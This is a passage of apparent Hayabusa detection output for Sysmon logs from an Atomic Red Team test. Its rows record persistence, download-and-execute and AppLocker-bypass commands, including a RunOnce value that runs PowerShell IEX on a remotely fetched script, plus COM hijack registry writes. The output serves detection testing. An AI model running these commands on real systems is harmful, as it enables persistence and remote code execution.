| PGUID: 747F3D96-D739-5D31-0000-0010B2C22600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:32.101 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | Process: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5348 | PGUID: 747F3D96-D750-5D31-0000-0010B9F82600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.219 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-D765-5D31-0000-001027B72800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.219 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" | LID: 0x50951 | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.258 +00:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.292 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team: C:\Path\AtomicRedTeam.exe | Process: C:\Windows\system32\reg.exe | PID: 2068 | PGUID: 747F3D96-D765-5D31-0000-001086B92800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.292 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.330 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5824 | PGUID: 747F3D96-D765-5D31-0000-0010D7BD2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.349 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /f"" | LID: 0x50951 | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.371 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\Windows\CurrentVersion\Run\Atomic Red Team | Process: C:\Windows\system32\reg.exe | PID: 2912 | PGUID: 747F3D96-D765-5D31-0000-001022C02800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:44:53.402 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4264 | PGUID: 747F3D96-D765-5D31-0000-001024C32800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.075 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D772-5D31-0000-0010BEE52800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.075 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll | LID: 0x50951 | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 +00:00,MSEDGEWIN10,1,medium,Persis,Reg Add RUN Key,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.137 +00:00,MSEDGEWIN10,1,medium,Persis,Direct Autorun Keys Modification,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.161 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1: C:\Path\AtomicRedTeam.dll | Process: C:\Windows\system32\reg.exe | PID: 3772 | PGUID: 747F3D96-D772-5D31-0000-001010E82800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.196 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6472 | PGUID: 747F3D96-D772-5D31-0000-001031EB2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.213 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" | LID: 0x50951 | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.240 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend\1 | Process: C:\Windows\system32\reg.exe | PID: 6120 | PGUID: 747F3D96-D772-5D31-0000-001083ED2800,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:06.267 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D772-5D31-0000-00107CF02800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - via Run key | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString(`""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`"")"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,Persis,Powershell in Windows Run Keys,,rules/sigma/registry_sysmon/registry_set/registry_set_powershell_in_run_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:19.483 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:24.234 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,Persistence - via Run key | DeleteValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NextRun | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 +00:00,MSEDGEWIN10,11,low,Persis,Startup Folder File Write,,rules/sigma/file_event/file_event_win_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:31.287 +00:00,MSEDGEWIN10,11,high,,PowerShell Writing Startup Shortcuts,,rules/sigma/file_event/file_event_win_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6748 | PGUID: 747F3D96-D7A3-5D31-0000-0010A0A22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.105 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" | LID: 0x50951 | PID: 4784 | PGUID: 747F3D96-D7A3-5D31-0000-0010F2A42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 6344 | PGUID: 747F3D96-D7A3-5D31-0000-001035B02900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.681 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D7A3-5D31-0000-001081B22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.681 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.699 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" | LID: 0x50951 | PID: 6176 | PGUID: 747F3D96-D7A3-5D31-0000-0010D2B42900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:55.699 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:56.033 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D7A4-5D31-0000-0010C9C22900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:45:56.069 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-D7A4-5D31-0000-001020C62900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.052 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2056 | PGUID: 747F3D96-D7BB-5D31-0000-0010E7FE2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.443 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs | LID: 0x50951 | PID: 4124 | PGUID: 747F3D96-D7BB-5D31-0000-00108F082A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.484 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:19.484 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.767 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\(Default): mscoree.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.775 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\ThreadingModel: Both | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.787 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.802 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.817 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.824 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.830 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Class: regsvcser.Bypass | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.841 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\Assembly: T1121, Version=0.0.0.0, Culture=neutral, PublicKeyToken=cb1364609f40a1dc | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.849 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: 